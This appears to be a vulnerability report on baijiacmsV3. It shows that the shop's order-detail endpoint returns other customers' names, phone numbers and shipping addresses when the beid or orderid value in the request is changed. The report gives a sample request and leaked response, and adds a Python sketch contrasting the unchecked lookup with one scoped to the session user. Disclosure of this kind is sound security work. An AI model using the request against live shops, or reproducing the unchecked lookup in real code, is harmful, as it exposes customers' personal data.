Information leakage caused by improper authorization control in baijiacmsV3 (https://github.com/baijiacms/baijiacmsV3)
In the admin backend, add a store; after its domain name is configured, visit the store's home page.
![](https://img.haomeiwen.com/i11958490/a0e1aa809fcb1f55.png)
![](https://img.haomeiwen.com/i11958490/b59ae13640b127ad.png)
The order-detail endpoint leaks the user's receiving (shipping) address.
Example: "http://127.0.0.1/baijiacmsV3-master/index.php?mod=mobile&name=shopwap&do=myorder&op=detail&orderid=3&beid=2"
Response:{"message":{"id":"1","realname":"zhangsan","mobile":"13112345678","province":"\u5317\u4eac\u5e02","city":"\u5317\u4eac\u8f96\u533a","area":"\u4e1c\u57ce\u533a","address":"zhangsan_test"},"redirect":"","type":"ajax"}
The beid parameter value can be modified to view other users' receiving addresses: the endpoint looks the order up by id without verifying that it belongs to the logged-in user.
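The following is an added illustration of the missing check, not code from baijiacmsV3: a minimal handler for the myorder/detail request above, written first as the vulnerable lookup (order resolved by beid/orderid only) and then with the lookup scoped to the authenticated user. The order and address tables, the user ids and the `session_uid` argument are constructed for the example and do not reflect the CMS's real schema.

```python
from urllib.parse import urlparse, parse_qs

# Request URL quoted in the report above.
REPORTED_URL = ("http://127.0.0.1/baijiacmsV3-master/index.php?mod=mobile&name=shopwap"
                "&do=myorder&op=detail&orderid=3&beid=2")

# Constructed sample data standing in for the order and address tables (hypothetical).
ORDERS = {
    # (beid, orderid) -> owning user id and the address record the order ships to
    (2, 3): {"uid": 10, "address_id": 1},
    (2, 4): {"uid": 11, "address_id": 2},
}
ADDRESSES = {
    1: {"realname": "zhangsan", "mobile": "13112345678", "address": "zhangsan_test"},
    2: {"realname": "lisi", "mobile": "13198765432", "address": "lisi_test"},
}


def parse_request(url):
    """Extract (beid, orderid) from the query string of the detail request."""
    q = parse_qs(urlparse(url).query)
    return int(q["beid"][0]), int(q["orderid"][0])


def order_detail_vulnerable(url, session_uid):
    """Vulnerable pattern: the order is resolved from client-controlled ids only.
    session_uid is accepted but never consulted, so any order id returns its address."""
    order = ORDERS.get(parse_request(url))
    if order is None:
        return {"type": "ajax", "message": None}
    return {"type": "ajax", "message": ADDRESSES[order["address_id"]]}


def order_detail_fixed(url, session_uid):
    """Hardened pattern: session_uid comes from the server-side session (never from the
    request) and the lookup is additionally bound to it, so tampering with beid or
    orderid can only ever resolve to one of the caller's own orders."""
    order = ORDERS.get(parse_request(url))
    if order is None or order["uid"] != session_uid:
        # Identical response for "does not exist" and "not yours": the endpoint must not
        # confirm which order ids exist for other users.
        return {"type": "ajax", "message": None, "error": "order not found"}
    return {"type": "ajax", "message": ADDRESSES[order["address_id"]]}
```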